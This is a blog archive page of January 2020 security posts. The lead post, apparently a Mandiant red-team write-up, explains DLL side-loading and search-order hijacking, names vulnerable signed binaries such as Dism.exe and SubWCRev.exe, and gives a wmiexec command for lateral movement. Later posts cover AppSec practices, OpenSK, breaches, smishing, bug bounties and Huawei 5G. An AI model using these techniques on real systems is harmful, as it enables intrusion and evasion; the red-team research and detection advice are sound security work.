Monthly Archives: January 2020

Abusing DLL Misconfigurations — Using Threat Intelligence to Weaponize R&D

DLL Abuse Techniques Overview

Dynamic-link library (DLL) side-loading occurs when Windows Side-by-Side (WinSxS) manifests are not explicit about the characteristics of DLLs being loaded by a program. In layman’s terms, DLL side-loading can allow an attacker to trick a program into loading a malicious DLL. If you are interested in learning more about how DLL side-loading works and how we see attackers using this technique, read through our whitepaper.

DLL hijacking occurs when an attacker is able to take advantage of the Windows search and load order, allowing the execution of a malicious DLL, rather than the legitimate DLL.

DLL side-loading and hijacking has been around for years; in fact, FireEye Mandiant was one of the first to discover the DLL side-loading technique along with DLL search order hijacking back in 2010. So why are we still writing a blog about it? Because it’s still a method that works and is used in real world intrusions! FireEye Mandiant still identifies and observes threat groups using DLL abuse techniques during incident response (IR) engagements. There are still plenty of signed executables vulnerable to this, and our red team has weaponized DLL abuse techniques to be part of our methodology. For detection and preventative measures on DLL abuse techniques, see the “Detection and Preventative Measures” section in this blog post.

Even though DLL abuse techniques are not new or cutting edge, this blog post will showcase how the FireEye Mandiant red team uses FireEye Intelligence to expedite the research phase of identifying vulnerable executables, at scale! We will also walk you through how to discover new executables susceptible to DLL abuse and how the FireEye Mandiant red team has weaponized these DLL abuse techniques in its DueDLLigence tool. The DueDLLigence tool was initially released to be a framework for application whitelisting bypasses, but given the nature of unmanaged exports it can be used for DLL abuse techniques as well.

Collecting and Weaponizing FireEye Intelligence

A benefit of being part of the red team at FireEye Mandiant is having access to a tremendous amount of threat intelligence; Our organization’s incident response and intelligence consultants have observed, documented, and analysed the actions of attackers across almost every major breach over the past decade. For this project, the FireEye Mandiant red team asked the FireEye Technical Operations and Reverse Engineering Advanced Practices (TORE AP) team to leverage FireEye Intelligence and provide us with all DLL abuse techniques used by attackers that matched the following criteria:

  1. A standalone PE file (.exe file) was used to call a malicious DLL
  2. The .exe must be signed and the certificate not expire within a year
  3. The intelligence about the technique must include the name of the malicious DLL that was called

Once the results were provided to the red team, we started weaponizing the intelligence by taking the approach outlined in the rest of the post, which includes:

  1. Identifying executables susceptible to DLL search order hijacking
  2. Identifying library dependencies for the executable
  3. Satisfying API’s exported in the library
DLL Search Order Hijacking

In many cases it is possible to execute code within the context of a legitimate Portable Executable (PE) by taking advantage of insecure library references. If a developer allows LoadLibrary to resolve the path of a library dynamically then that PE will also look in the current directory for the library DLL. This behavior can be used for malicious purposes by copying a legitimate PE to a directory where the attacker has write access. If the attacker creates a custom payload DLL, then the application will load that DLL and execute the attacker’s code. This can be beneficial for a red team: the PE may be signed and have the appearance of trust to the endpoint security solution (AV/EDR), it may bypass application white listing (AWL) and can confuse/delay an investigation process.

In this section we will look at one example where we identify the conditions for hijacking a PE and implement the requirements in our payload DLL. For this test case we will use a signed binary PotPlayerMini (MD5: f16903b2ff82689404f7d0820f461e5d). This PE was chosen since it has been used by attackers dating back to 2016.

Identifying Library Dependencies

It is possible to determine which libraries and exports a PE requires through static analysis with tools such as IDA or Ghidra. The screenshot shown in Figure 1, for example, shows that PotPlayerMini tries to load a DLL called “PotPlayer.dll”.


Figure 1: Static Analysis of DLL's loaded by PotPlayerMini

Where static analysis is not feasible or desirable it may be possible to use a hooking framework such as API Monitor or Frida to profile the LoadLibrary / GetProcAddress behavior of the application.

In Figure 2 we used API Monitor to see this same DLL loading behavior. As you can see, PotPlayerMini is looking for the PotPlayer.dll file in its current directory. At this point, we have validated that PotPlayerMini is susceptible to DLL search order hijacking.


Figure 2: Dynamic Analysis of DLL's loaded by PotPlayerMini

Satisfying Exports

After identifying potentially vulnerable library modules we need to apply a similar methodology to identify which exports are required from the module PE. Figure 3 shows a decompiled view from PotPlayerMini highlighting which exports it is looking for within the GetProcAddress functions using static analysis. Figure 4 shows performing this same analysis of exports in the PotPlayerMini application, but using dynamic analysis instead.


Figure 3: Static Analysis of exports in PotPlayerMini DLL


Figure 4: Dynamic Analysis of exports in PotPlayerMini DLL

In our case the payload is a .NET DLL which uses UnmanagedExports so we have to satisfy all export requirements from the binary as shown in Figure 5. This is because the .NET UnmanagedExports library does not support DllMain, since that is an entry point and is not exported. All export requirements need to be satisfied to ensure the DLL has all the functions exported which the program accesses via GetProcAddress or import address table (IAT). These export methods will match those that were observed in the static and dynamic analysis. This may require some trial and error depending on the validation that is present in the binary.


Figure 5: Adding export requirements in .NET DLL

Once we execute the binary, we can see that it successfully executes our function as shown in Figure 6.


Figure 6: Executing binary susceptible to DLL abuse

DLL Hijacking Without Satisfying All Exports

When writing a payload DLL in C/C++ it is possible to hijack control flow in DllMain. When doing this it is not necessary to enumerate and satisfy all needed exports as previously described. There also may be cases where the DLL does not have any exports and can only be hijacked via the DllMain entry point.

An example of this can be shown with the Windows Media Player Folder Sharing executable called wmpshare.exe. You can copy the executable to a directory out of its original location (C:\Program Files (x86)\Windows Media Player) and perform dynamic analysis using API Monitor. In Figure 7, you can see that the wmpshare.exe program uses the LoadLibraryW method to load the wmp.dll file, but does not specify an explicit path to the DLL. When this happens, the LoadLibraryW method will first search the directory in which the process was created (present working directory). Full details on the search order used can be found in  the LoadLibraryW documentation and the CreateProcess documentation.


Figure 7: Viewing LoadLibrary calls in wmpshare.exe

Since it does not specify an explicit path, you can test if it can be susceptible to DLL hijacking by creating a blank file named “wmp.dll” and copying it to the same directory as the wmpshare.exe file. Now when running the wmpshare executable in API Monitor, you can see it is first checking in its current directory for the wmp.dll file, shown in Figure 8. Therefore, it is possible to use this binary for DLL hijacking.


Figure 8: Viewing LoadLibrary calls in wmpshare.exe with dummy dll present

Figure 9 shows using the wmpshare executable in a weaponized manner to take advantage of the DllMain entry point with a DLL created in C++.


Figure 9: Using the DllMain entry point

Discovering New Executables Susceptible to DLL Abuse

In addition to weaponizing the FireEye intelligence of the executables used for DLL abuse by attackers, the FireEye Mandiant red team performed research to discover new executables susceptible to abuse by targeting Windows system utilities and third-party applications.

Windows System Utilities

The FireEye Mandiant red team used the methodology previously described in the Collecting and Weaponizing FireEye Intelligence section to look at Windows system utilities present in the C:\Windows\System32 directory that were susceptible to DLL abuse techniques. One of the system utilities found was the deployment image servicing and management (DISM) utility (Dism.exe). When performing dynamic analysis of this system utility, it was observed that it was attempting to load the DismCore.dll file in the current directory as shown in Figure 10.


Figure 10: Performing dynamic analysis of Dism utility

Next, we loaded the DISM system utility into API Monitor from its normal path (C:\Windows\System32) in order to see the required exports as shown in Figure 11.


Figure 11: Required exports for DismCore.dll

The code shown in Figure 12 was added to DueDLLigence to validate that the DLL was vulnerable and could be ran successfully using the DISM system utility.


Figure 12: Dism export method added to DueDLLigence

Third-Party Applications

The FireEye Mandiant red team also targeted executable files associated with common third-party applications that could be susceptible to DLL abuse. One of the executable files discovered was a Tortoise SVN utility (SubWCRev.exe).  When performing dynamic analysis of this Tortoise SVN utility, it was observed that it was attempting to load crshhndl.dll in the current directory. The export methods are shown in Figure 13.


Figure 13: Performing dynamic analysis of SubWCRev.exe

The code shown in Figure 14 was added to DueDLLigence to validate that the DLL was vulnerable and could be ran successfully using the Tortoise SVN utility.


Figure 14: SubWCRev.exe export methods added to DueDLLigence

Applying It to the Red Team

Having a standalone trusted executable allows the red team to simply copy the trusted executable and malicious DLL to a victim machine and bypass various host-based security controls, including application whitelisting. Once the trusted executable (vulnerable to DLL abuse) and malicious DLL are both in the same present working directory, the executable will call the corresponding DLL within the same directory. This method can be used in multiple phases of the attack lifecycle as payload implants, including phases such as establishing persistence and performing lateral movement.

Persistence

In this example, we will be using the Windows system utility Dism.exe discovered in the Windows System Utilities section as our executable, along with a DLL generated by DueDLLigence in conjunction with SharPersist to establish persistence on a target system. First, the DISM system utility and malicious DLL are uploaded to the target system as shown in Figure 15.


Figure 15: Uploading payload files

Then we use SharPersist to add startup folder persistence, which uses our DISM system utility and associated DLL as shown in Figure 16.


Figure 16: Adding startup folder persistence with SharPersist

After the target machine has been rebooted and the targeted user has logged on, Figure 17 shows our Cobalt Strike C2 server receiving a beacon callback from our startup folder persistence where we are living in the Dism.exe process.


Figure 17: Successful persistence callback

Lateral Movement

We will continue using the same DISM system utility and DLL file for lateral movement. The HOGWARTS\adumbledore user has administrative access to the remote host 192.168.1.101 in this example. We transfer the DISM system utility and the associated DLL file via the SMB protocol to the remote host as shown in Figure 18.


Figure 18: Transferring payload files to remote host via SMB

Then we setup a SOCKS proxy in our initial beacon, and use Impacket’s wmiexec.py to execute our payload via the Windows Management Instrumentation (WMI) protocol, as shown in Figure 19 and Figure 20.

proxychains python wmiexec.py -nooutput DOMAIN/user:password:@x.x.x.x C:\\Temp\\Dism.exe

Figure 19: Executing payload via WMI with Impacket’s wmiexec.py


Figure 20: Output of executing command shown in Figure 19

We receive a beacon from the remote host, shown in Figure 21, after executing the DISM system utility via WMI.


Figure 21: Obtaining beacon on remote host

Detection and Preventative Measures

Detailed prevention and detection methods for DLL side-loading are well documented in the whitepaper and mentioned in the DLL Abuse Techniques Overview. The whitepaper breaks it down into preventative measures at the software development level and goes into recommendations for the endpoint user level. A few detection methods that are not mentioned in the whitepaper include:

  • Checking for processes that have unusual network connectivity
    • If you have created a baseline of normal process network activity, and network activity for a given process has become different than the baseline, it is possible the said process has been compromised.
  • DLL whitelisting
    • Track the hashes of DLLs used on systems to identify discrepancies.

These detection methods are difficult to implement at scale, but possible to utilize. That is exactly why this old technique is still valid and used by modern red teams and threat groups. The real problem that allows this vulnerability to continue to exist has to do with software publishers. Software publishers need to be aware of DLL abuse techniques and know how to prevent such vulnerabilities from being developed into products (e.g. by implementing the mitigations discussed in our whitepaper). Applying these recommendations will reduce the DLL abuse opportunities attackers use to bypass several modern-day detection techniques.

Microsoft has provided some great resources on DLL security and triaging a DLL hijacking vulnerability.

Conclusion

Threat intelligence provides immense value to red teamers who are looking to perform offensive research and development and emulate real-life attackers. By looking at what real attackers are doing, a red teamer can glean inspiration for future tooling or TTPs.

DLL abuse techniques can be helpful from an evasion standpoint in multiple phases of the attack lifecycle, such as persistence and lateral movement. There will continue to be more executables discovered that are susceptible to DLL abuse and used by security professionals and adversaries alike.

Best Practices and Practical Steps to Guide Your AppSec Journey

Imagine that you are tasked with planning a vacation for you and your family. For your ideal trip, you would jet off to a five-star resort on a private island for a month of pampering and fine dining. But, since you have two children, a limited budget, and only one week of paid time off, you settle for a three-star, theme park resort with a spa and outdoor pool. Your family has a great time on the vacation and, using your new-found trip planning skills, you start preparing and saving for your dream getaway.

Spearheading an application security (AppSec) program can sometimes feel a little like that type of vacation planning ??? you can see an ideal state, but it can feel unattainable. Just like planning a vacation, creating an AppSec program is also dependent on time and money, as well as an organization???s staff expertise, culture, and executive support.

Below, we look at both the best practices, and some practical first steps you can take that will prepare your AppSec program for improvements in the future. In other words, keep your eye on the private island AppSec, while moving forward with the theme park AppSec.

Best Practice #1: Use More Than One Application Security Testing Type

When you visit the doctor with an ailment, you undergo several tests to determine the diagnosis. There is no magic test that detects all illnesses. The same goes for AppSec tests ??? there is no one test that detects every vulnerability. So, to make sure that your application is fully secure, the best practice is to use as many testing types as possible.

Practical Advice: Start with What Makes the Most Sense, Then Add More Later

Develop an AppSec strategy to determine where you need AppSec solutions the most. Start by implementing the tests that will have the most impact, in the shortest amount of time, for the least amount of money. From there, you can start adding on more tests.

There are several factors that will help determine which tests will have the most impact. For example, if you have multiple applications, rank the applications based on the criticality of their risks, and test the applications with the most critical risks first. Another thing to consider is programming languages. If you leverage less-mainstream programming languages, there are limitations regarding the AppSec tests you can use. So start with tests that are not specific to language, like dynamic or penetration testing.

Best Practice #2: Shift Security Left

In today???s fast-paced world, enterprises are moving from yearly product releases to monthly, weekly, or daily releases. To keep up with this change, security testing needs to be woven into the development cycle instead of after the development cycle. That way, when it is time to release the product, security testing will not stand in the way.

Practical Advice: Shift Security Culture Left

Moving security testing into the development cycle means that developers will play a bigger security role. Since most development and security teams have never worked together, ???shifting security left??? can be a significant cultural change.

Before making this change, a good first step is to help security understand how development works and to build a relationship. Understanding how development works involves learning their tools and process, as well as how they build software, so that security testing can be integrated organically. When security is organically weaved into the development process, developers are more likely to be receptive of security, making it easier to forge trusting relationships.

You should also look for ways to automate security testing into the CI/CD pipeline. By integrating automated security tools into the CI/CD pipeline, you can incorporate testing without handing off code to another team, making it easier for developers to fix issues immediately.

Best Practice #3: Fix Everything Fast

Finding vulnerabilities is only half of the battle. You need to have a solid plan in place to fix them once they are discovered. Automating security testing in CI/CD pipelines allows organizations to not only find flaws faster, but it also speeds up the remediation process.

Practical Advice: Prioritize Fixes While Creating Fewer Vulnerabilities

As much as we would love to fix all flaws instantaneously, it is not possible. A practical first step in remediation is prioritizing. When prioritizing your flaws, do not just concentrate on defect severity, also consider the criticality of the application and how easy it would be to exploit the flaw.

Best Practice #4: Embed Security Champions into Development Teams

Most developers do not have a security background. This makes it very challenging when you try to implement security tests in the development lifecycle. A way to help fill this knowledge gap is to select interested volunteers from the development teams to become security champions. Security champions learn about security testing and can reiterate important security messages back to their teams.

Practical Advice: Build Up Your Security Champions Capabilities

Building a team of security champions takes time. Start by making sure your organization???s security, development, and leadership teams are all on board with the security champions concept. Once everyone agrees with the idea, help the security and development teams build a relationship. If developers and security personnel are on good terms, you have a much better chance of developers agreeing to become security champions.

Next, identify your champions. Security champions should be selected based on a demonstrated or perceived interest in learning more about security. If you select developers who do not have an interest in security, there is a high probably that they will not be successful in the role. Lastly, nurture your identified champions by giving them the appropriate tools and support, like additional training in security concepts and code reviews, needed for success.

Best Practice #5: Measure Your AppSec Results

It???s critical to be able to measure and report on the success of an AppSec program in metrics. Identify which metrics are most important to your organization???s key decision-makers, then display the metrics in an easy-to-understand, actionable manner.

Practical Advice: Focus on Your Policy Metric

Bringing too many metrics to your executives early on can be overwhelming and, quite frankly, unnecessary. Start by presenting one metric: how your AppSec program is complying with your internal AppSec policy. From here, you can start sharing other valuable metrics.

Remember, just like saving for your dream getaway, creating the perfect AppSec program takes time. But taking practical steps and looking toward the big picture will help you get closer to perfect sooner.

Learn more about the steps you can take to achieve AppSec maturity in our recent guide, Application Security Best Practices vs. Practicalities: What to Strive for and Where to Start.

Jeff Bezos met FBI investigators in 2019 over alleged Saudi hack

Amazon founder interviewed as FBI conducts inquiry into Israeli firm linked to malware

Jeff Bezos met federal investigators in April 2019 after they received information about the alleged hack of the billionaire’s mobile phone by Saudi Arabia, the Guardian has been told.

Bezos was interviewed by investigators at a time when the FBI was conducting an investigation into the Israeli technology company NSO Group, according to a person who was present at the meeting.

Continue reading...

Say hello to OpenSK: a fully open-source security key implementation



Today, FIDO security keys are reshaping the way online accounts are protected by providing an easy, phishing-resistant form of two-factor authentication (2FA) that is trusted by a growing number of websites, including Google, social networks, cloud providers, and many others. To help advance and improve access to FIDO authenticator implementations, we are excited, following other open-source projects like Solo and Somu, to announce the release of OpenSK, an open-source implementation for security keys written in Rust that supports both FIDO U2F and FIDO2 standards.

Photo of OpenSK developer edition: a Nordic Dongle running the OpenSK firmware on DIY case

By opening up OpenSK as a research platform, our hope is that it will be used by researchers, security key manufacturers, and enthusiasts to help develop innovative features and accelerate security key adoption.

With this early release of OpenSK, you can make your own developer key by flashing the OpenSK firmware on a Nordic chip dongle. In addition to being affordable, we chose Nordic as initial reference hardware because it supports all major transport protocols mentioned by FIDO2: NFC, Bluetooth Low Energy, USB, and a dedicated hardware crypto core. To protect and carry your key, we are also providing a custom, 3D-printable case that works on a variety of printers.

“We’re excited to collaborate with Google and the open source community on the new OpenSK research platform,” said Kjetil Holstad, Director of Product Management at Nordic Semiconductor. “We hope that our industry leading nRF52840’s native support for secure cryptographic acceleration combined with new features and testing in OpenSK will help the industry gain mainstream adoption of security keys.”

While you can make your own fully functional FIDO authenticator today, as showcased in the video above, this release should be considered as an experimental research project to be used for testing and research purposes.


Under the hood, OpenSK is written in Rust and runs on TockOS to provide better isolation and cleaner OS abstractions in support of security. Rust’s strong memory safety and zero-cost abstractions makes the code less vulnerable to logical attacks. TockOS, with its sandboxed architecture, offers the isolation between the security key applet, the drivers, and kernel that is needed to build defense-in-depth. Our TockOS contributions, including our flash-friendly storage system and patches, have all been upstreamed to the TockOS repository. We’ve done this to encourage everyone to build upon the work.


How to get involved and contribute to OpenSK 

To learn more about OpenSK and how to experiment with making your own security key, you can check out our GitHub repository today. With the help of the research and developer communities, we hope OpenSK over time will bring innovative features, stronger embedded crypto, and encourage widespread adoption of trusted phishing-resistant tokens and a passwordless web.

Acknowledgements

We also want to thank our OpenSK collaborators: Adam Langley, Alexei Czeskis, Arnar Birgisson, Borbala Benko, Christiaan Brand, Dirk Balfanz, Dominic Rizzo, Fabian Kaczmarczyck, Guillaume Endignoux, Jeff Hodges, Julien Cretin, Mark Risher, Oxana Comanescu, Tadek Pietraszek

Security Lessons From 2019’s Biggest Data Breaches

2019 already feels like it’s worlds away, but the data breaches many consumers faced last year are likely to have lasting effects. As we look back on 2019, it’s important to reflect on how our online security has been affected by various threats. With that said, let’s take a look at the biggest breaches of the year and how they’ve affected users everywhere.

Capital One breach

In late July, approximately 100 million Capital One users in the U.S. and 6 million in Canada were affected by a breach exposing about 140,000 Social Security numbers, 1 million Canadian Social Insurance numbers, 80,000 bank account numbers, and more. As one of the 10 largest banks based on U.S. deposits, the financial organization was certainly poised as an ideal target for a hacker to carry out a large-scale attack. The alleged hacker claimed that the data was obtained through a firewall misconfiguration, allowing for command execution with a server that granted access to data in Capital One’s storage space.

Facebook breach

In early September, a security researcher found an online database exposing 419 million user phone numbers linked to Facebook accounts. The exposed server was left without password protection, so anyone with internet access could find the database. The breached records contained a user’s unique Facebook ID and the phone number associated with the account. In some instances, the records also revealed the user’s name, gender, and location by country.

Collection #1 breach

Last January, we met Collection #1, a monster data set that exposed 772,904,991 unique email addresses and over 21 million unique passwords. Security researcher Troy Hunt first discovered this data set on the popular cloud service MEGA, specifically uncovering a folder holding over 12,000 files. Due to the sheer volume of the breach, the data was likely comprised of multiple breaches. When the storage site was taken down, the folder was then transferred to a public hacking site, available for anyone to take for free.

Verifications.io breach

Less than two months after Collection #1, researchers discovered a 150-gigabyte database containing 809 million records exposed by the email validation firm Verifications.io. This company provides a service for email marketing firms to outsource the extensive work involved with validating mass amounts of emails. This service also helps email marketing firms avoid the risk of having their infrastructure blacklisted by spam filters. Therefore, Verifications.io was entrusted with a lot of data, creating an information-heavy database complete with names, email addresses, phone numbers, physical addresses, gender, date of birth, personal mortgage amounts, interest rates, and more.

Orvibo breach

In mid-June, Orvibo, a smart home platform designed to help users manage their smart appliances, left an Elasticsearch server (a highly scalable search and analytics engine that allows users to store, search, and analyze big volumes of data in real-time) online without password protection. The exposure left at least two billion log entries each containing customer data open to the public. This data included customer email addresses, the IP address of the smart home devices, Orvibo usernames, and hashed passwords, or, unreadable strings of characters that are designed to be impossible to convert back into the original password.

What Users Can Learn From Data Breaches

Data breaches serve as a reminder that users and companies alike should do everything in their power to keep personal information protected. As technology continues to become more advanced, online threats will also evolve to become more sophisticated. So now more than ever, it’s imperative that users prioritize the security of their digital presence, especially in the face of massive data leaks. If you think you might have been affected by a data breach or want to take the necessary precautions to safeguard your information, follow these tips to help you stay secure:

  • Research before you buy.Although you might be eager to get the latest new device, some are made more secure than others. Look for devices that make it easy to disable unnecessary features, update software, or change default passwords. If you already have an older device that lacks these features, consider upgrading.
  • Be vigilant when monitoring your personal and financial data. A good way to determine whether your data has been exposed or compromised is to closely monitor your online accounts. If you see anything fishy, take extra precautions by updating your privacy settings, changing your password, or using two-factor authentication.
  • Use strong, unique passwords. Make sure to use complex passwords for each of your accounts, and never reuse your credentials across different platforms. It’s also a good idea to update your passwords consistently to further protect your data.
  • Enable two-factor authentication. While a strong and unique password is a good first line of defense, enabling app-based two-factor authentication across your accounts will help your cause by providing an added layer of security.
  • Use a comprehensive security solution. Use a solution like McAfee Total Protection to help safeguard your devices and data from known vulnerabilities and emerging threats.

Stay Up to Date

To stay on top of McAfee news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Security Lessons From 2019’s Biggest Data Breaches appeared first on McAfee Blogs.

NICE Webinar: Learning Principles for Cybersecurity Practice

The PowerPoint slides used during this webinar can be downloaded here. Speakers: Craig Jackson Program Director, Indiana University’s Center for Applied Cybersecurity Research Scott Russell Senior Policy Analyst, Indiana University’s Center for Applied Cybersecurity Research Susan Sons Chief Security Analyst, Indiana University’s Center for Applied Cybersecurity Research Synopsis: The NICE Cybersecurity Workforce Framework includes a few knowledge statements that are common for all work roles, including “Knowledge of cybersecurity and privacy principles.” What are the “cybersecurity principles

What Software Composition Analysis and Your Dentist Have in Common

SAST, DAST, IAST, SCA ??ヲ confused about the differences? We thought it might be helpful to clear things up by using the analogy of human health. When you visit the doctor with an ailment, or even for a routine checkup, you are likely to undergo a series of tests to find potential health conditions or diseases. Since the tests are targeting different parts of the mind or body, the results may vary. So, the more tests performed, the better the chances of discovering and treating an illness. The same logic applies to security health. The more application security tests performed, the better the odds are that you will find and remediate security flaws or vulnerabilities.

Now that we understand the importance of the application security tests, and we know that they are looking for different vulnerabilities and flaws, how can we distinguish between them? We will continue with the human health analogy, comparing AppSec tests to common, easy-to-understand health tests.

Static analysis

Make no bones about it, static analysis is very similar to an X-ray. Just like X-rays, which produce a static image to find torn and broken bones, static analysis evaluates an application from the inside out, reviewing stationary code for security vulnerabilities. By catching the vulnerabilities before running the application, developers can fix flaws in a timely, cost-efficient manner.

Dynamic analysis

Dynamic analysis is comparable to a reflex test. During a reflex test, the doctor taps a tendon to make sure that the patient???s motor and sensory skills are intact. Dynamic analysis leverages a similar outside-in approach, poking and prodding at the running application to analyze vulnerabilities.

Software composition analysis

For software composition analysis (SCA), you can think of a dental exam. During a dental exam, if you have cavities, your fillings are inspected. Although fillings are not an organic part of the body, if undetected and untreated, faulty dental fillings can lead to serious illness. This concept is a lot like software composition analysis. SCA inspects open source code for vulnerabilities. This is code that you didn't write yourself, but it's still affects the security and the health of the application. Despite the fact that open source is a third-party component, if vulnerabilities go undetected, it is nothing to smile about.

Interactive analysis

Interactive analysis can best be compared to an Electrocardiography (EKG) exam. An EKG is when a doctor puts electrodes on your chest to measure your heart rate. The doctor might have you exercise while conducting the EKG to evaluate your heart under stress. With interactive analysis, you place an agent in the runtime environment and put the application under load. From there, you can see what vulnerabilities the agent discovers.

Penetration test

A penetration test is the equivalent of a doctor???s personal assessment. When you visit the doctor and convey your symptoms, the doctor uses their expertise to provide a diagnosis. It is not unusual for the doctor to pick up on an illness that is undetectable by an exam. Similarly, with a penetration exam, an expert penetration tester simulates a security attack on the application to find vulnerabilities often undetectable by other, more automated methods.

So, the next time you visit the doctor and undergo several tests, remember that each test holds a purpose. And when it is time to evaluate your AppSec program, remember that the same logic holds true. The more security tests you are able to perform, the better the chances of catching vulnerabilities.

Learn More

Get more details on the strengths and weaknesses of the different AppSec testing types in our recent guide, Application Security Best Practices vs. Practicalities: What to Strive for and Where to Start.

What You Need to Know About the FedEx SMiShing Scam

You receive a text message saying that you have a package out for delivery. While you might feel exhilarated at first, you should think twice before clicking on that link in the text. According to CNN, users across the U.S. are receiving phony text messages claiming to be from FedEx as part of a stealthy SMS phishing (SMiShing) campaign.

How SMiShing Works

This SMiShing campaign uses text messages that show a supposed tracking code and a link to “set delivery preferences.” The link directs the recipient to a scammer-operated website disguised as a fake Amazon listing. The listing asks the user to take a customer satisfaction survey. After answering a couple of questions, the survey asks the user to enter personal information and a credit card number to claim a free gift, which still requires a small shipping and handling fee. But according to HowtoGeek.com, agreeing to pay the small shipping fee also signs the user up for a 14-day trial to the company that sells the scam products. After the trial period, the user will be billed $98.95 every month. What’s more, the text messages use the recipient’s real name, making this threat even stealthier.

How to Stay Protected

So, what can online shoppers do to defend themselves from this SMiShing scam? Check out the following tips to remain secure:

  • Be careful what you click on. Be sure to only click on links in text messages that are from a trusted source. If you don’t recognize the sender, or the SMS content doesn’t seem familiar, stay cautious and avoid interacting with the message.
  • Go directly to the source. FedEx stated that it would never send text messages or emails to customers that ask for money or personal information. When in doubt about a tracking number, go to the main website of the shipping company and search the tracking number yourself.
  • Enable the feature on your mobile device that blocks texts from the Internet. Many spammers send texts from an Internet service in an attempt to hide their identities. Combat this by using this feature to block texts sent from the Internet.
  • Use mobile security software. Make sure your mobile devices are prepared any threat coming their way. To do just that, cover these devices with a mobile security solution, such as McAfee Mobile Security.

To stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post What You Need to Know About the FedEx SMiShing Scam appeared first on McAfee Blogs.

Vulnerability Reward Program: 2019 Year in Review



Our Vulnerability Reward Programs were created to reward researchers for protecting users by telling us about the security bugs they find. Their discoveries help keep our users, and the internet at large, safe. We look forward to even more collaboration in 2020 and beyond.

2019 has been another record-breaking year for us, thanks to our researchers! We paid out over $6.5 million in rewards, doubling what we’ve ever paid in a single year. At the same time our researchers decided to donate an all-time-high of $500,000 to charity this year. That’s 5x the amount we have ever previously donated in a single year. Thanks so much for your hard work and generous giving!
Since 2010, we have expanded our VRPs to cover additional Google product areas, including Chrome, Android, and most recently Abuse. We've also expanded to cover popular third party apps on Google Play, helping identify and disclose vulnerabilities to impacted app developers. Since then we have paid out more than $21 million in rewards*. As we have done in years past, we are sharing our 2019 Year in Review across these programs.
What’s changed in the past year?

  • Chrome’s VRP increased its reward payouts by tripling the maximum baseline reward amount from $5,000 to $15,000 and doubling the maximum reward amount for high quality reports from $15,000 to $30,000. The additional bonus given to bugs found by fuzzers running under the Chrome Fuzzer Program is also doubling to $1,000. More details can be found in their program rules page.
  • Android Security Rewards expanded its program with new exploit categories and higher rewards. The top prize is now $1 million for a full chain remote code execution exploit with persistence which compromises the Titan M secure element on Pixel devices. And if you achieve that exploit on specific developer preview versions of Android, we’re adding in a 50% bonus, making the top prize $1.5 million. See our program rules page for more details around our new exploit categories and rewards.
  • Abuse VRP engaged in outreach and education to increase researchers awareness about the program, presenting an overview of our Abuse program in Australia, Malaysia, Vietnam, the UK and US.
  • The Google Play Security Reward Program expanded scope to any app with over 100 million installs, resulting in over $650,000 in rewards in the second half of 2019.
  • The Developer Data Protection Reward Program was launched in 2019 to identify and mitigate data abuse issues in Android apps, OAuth projects, and Chrome extensions.
We also had the goal of increasing engagement with our security researchers over the last year at events such as BountyCon in Singapore and ESCAL8 in London. These events not only allow us to get to know each of our bug hunters but also provide a space for bug hunters to meet one another and hopefully work together on future exploits.

A hearty thank you to everyone that contributed to the VRPs in 2019. We are looking forward to increasing engagement even more in 2020 as both Google and Chrome VRPs will turn 10. Stay tuned for celebrations. Follow us on @GoogleVRP

*The total amount was updated on January 28; it previously said we paid out more than $15 million in rewards.

Huawei set for limited UK 5G role, but can we Trust Huawei?

Today the UK Government decided Huawei can be allowed to help build the UK's 5G network, but remain banned from supplying kit to "sensitive parts" of the core network. The Prime Minister Boris Johnson made long await decision to ends months of concern for the Chinese telecoms giant. 

The PM had briefed US President Donald Trump about the decision. Trump has been very vocal on his stance exclaiming, “we are not going to do business with Huawei”, and recently Trump’s administration is reportedly nearing publication of a rule that could further block shipments of US-made goods to Huawei. Trump administrator has said it 'is disappointed' with UK government decision. China had warned the UK there could be "substantial" repercussions to other trade and investment plans had the company been banned outright.

There was ferocious debate in the UK parliament post the government announcement, with MPs calling into question the cybersecurity risks which could prevail – the US says the cybersecurity risks are severe, the UK’s security services say they can be managed, whereas Australia has opted for an outright ban. There’s a clear disconnect and the decision today could cause turmoil to the US/UK working relationship that could ultimately impact a post-Brexit trade deal.

Can Huawei be trusted or will using its equipment leave communication networks, and our own mobile phones, vulnerable? The US says Huawei is a security risk, given the firm is heavily state supported and is run by Mr Ren who served in the Chinese military. Huawei 5G equipment could be used for spying and negatively impacting critical national infrastructure. 

The National Cyber Security Centre (NCSC) published a document which says UK networks will have three years to comply with the caps on the use of Huawei's equipment.

"Huawei is reassured by the UK government's confirmation that we can continue working with our customers to keep the 5G rollout on track. It gives the UK access to world-leading technology and ensures a competitive market." the firm's UK chief Victor Zhang said in a statement.

UK security professionals have reported significant concerns around how digital transformation projects and the implementation of 5G will affect their risk posture. 89% of UK businesses said they have concerns around the implementation of emerging technologies and essential digital transformation projects and almost four in ten (38%) expect digital transformation and 5G to offer cybercriminals more effective and more destructive methods of achieving their nefarious goals, according to research from VMWare Carbon Black.

A10 Networks' VP of Strategy, Gunter Reiss said “The global dispute over whether tech giant Huawei should be used in national 5G networks has created a lot of geopolitical conversations around the 5G build-out, security to Critical National Infrastructure, and generally whether certain vendors should be included or excluded. However, operators need to base their decisions not on these opinions but on technology – the strength, innovation and security capabilities. With the massive increases in bandwidth, number of devices predicted to be on these networks and the growing security requirements, the technology being used must meet these needs.


A Security Compromise on Economical Grounds
"This is a good compromise between alleviating 'security' concerns and making sure that the 5G UK market is not harmed," commented Dimitris Mavrakis, a telecoms analyst at ABI Research. Previously I posted about National Security Vs Economic argument which has been behind the UK government decision - see The UK Government Huawei Dilemma and the Brexit Factor 

Top 10 Cloud Privacy Recommendations for Consumers

It’s Data Privacy Day and when it comes down to it, most of us don’t know exactly how many organizations have our data—let alone how it’s being collected or what it is being used for. Unfortunately, the stakes are higher than ever for those who are unwilling to take appropriate safeguards to defend their personal data, including identity theft, financial loss, and more.

While the cloud presents a wealth of opportunity for increased productivity, connectivity and convenience, it also requires a new set of considerations for ensuring safe use. There are many, but here are the top ten:

1. Don’t reuse passwords.

